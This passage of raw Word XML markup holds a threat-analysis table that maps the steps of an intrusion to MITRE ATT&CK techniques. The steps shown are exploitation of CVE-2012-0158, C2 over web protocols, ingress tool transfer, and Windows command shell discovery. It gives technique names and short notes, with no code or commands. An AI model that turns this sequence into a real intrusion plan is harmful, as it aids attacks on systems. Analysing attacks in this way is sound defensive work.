              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C5546E" w14:textId="365F720B" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286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3744BB88" w14:textId="60C9EFE5" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="627E7073" w14:textId="7FD66D32" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34B621BC" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DAE69C6" w14:textId="6DFA1E16" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62DB1364" w14:textId="19305A76" w:rsidR="00D0443B" w:rsidRPr="00B857D7" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36EC885F" w14:textId="73F8314D" w:rsidR="00A77D6E" w:rsidRPr="00C67790" w:rsidRDefault="00E338FC" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="00E338FC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>The user tricked into execution (CVE-2012-0158 allow remote attackers to execute arbitrary code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="764B740F" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1779C0" w14:textId="2CFBB87F" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01A69E09" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="00BF4875">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7009663B" w14:textId="4C979133" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>071</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33A3D0A9" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63AD39E1" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B02BB73" w14:textId="1047761F" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00DB36FD" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E889FB7" w14:textId="767F5534" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00C23065" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A63EB6C" w14:textId="67120AE1" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="005E690A" w:rsidP="00BF4875">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This technique to provide</w:t>
            </w:r>
            <w:r w:rsidR="00650BEB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> more detail on s</w:t>
            </w:r>
            <w:r w:rsidR="0095093B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="11E45111" w14:textId="54C7B01B" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031E7C4B" w14:textId="7D1212FB" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00535B08" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A0F771D" w14:textId="70338266" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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3E599158" w14:textId="3348FDBA" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F74B373" w14:textId="030EC24A" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10EAB61E" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C102647" w14:textId="2F6111D4" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D29A67A" w14:textId="6BE1FA5D" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBBE217" w14:textId="2B839738" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial installation connects to C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="69F11C63" w14:textId="5C710F55" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51EF1BDB" w14:textId="05090ADE" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="004F43B4" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2A601E" w14:textId="5D4C448F" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">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27B64BD9" w14:textId="1730B2D3" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27D32997" w14:textId="10D5EED2" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C8338F" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="202D4215" w14:textId="4D014850" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17887B5B" w14:textId="6EB46252" w:rsidR="002326B4" w:rsidRPr="002D1D50" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
            <w:r w:rsidR="002828B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="002326B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78661421" w14:textId="4692DA41" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Install upgraded tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="4A0CB57C" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EE6368C" w14:textId="63465859" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="004F43B4" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="017423AC" w14:textId="27A20D55" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286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5F89227F" w14:textId="1F53AF6C" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5856DDF3" w14:textId="0127A11E" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE7A8FA" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C26E012" w14:textId="45401515" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFD5800" w14:textId="3F45BC7F" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00DC3045" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54318007" w14:textId="551DA402" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D11489">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="00D11489">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Still part of Initial Access step. Commands executed </w:t>
            </w:r>
            <w:r w:rsidR="00CB3ABC" w:rsidRPr="00D11489">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>via .bat. Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265327A5" w14:textId="77777777" w:rsidR="00D0443B" w:rsidRPr="00D11489" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5425D296" w14:textId="399A0714" w:rsidR="00D0443B" w:rsidRPr="00B857D7" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D11489">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Now UKC Pivot Occurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="4B6F05C7" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5453BFEF" w14:textId="62D55008" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="004F43B4" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61271B9D" w14:textId="4169081E" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="345B459B" w14:textId="7D3D7D94" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1083 File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77AEDB57" w14:textId="685CA51B" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
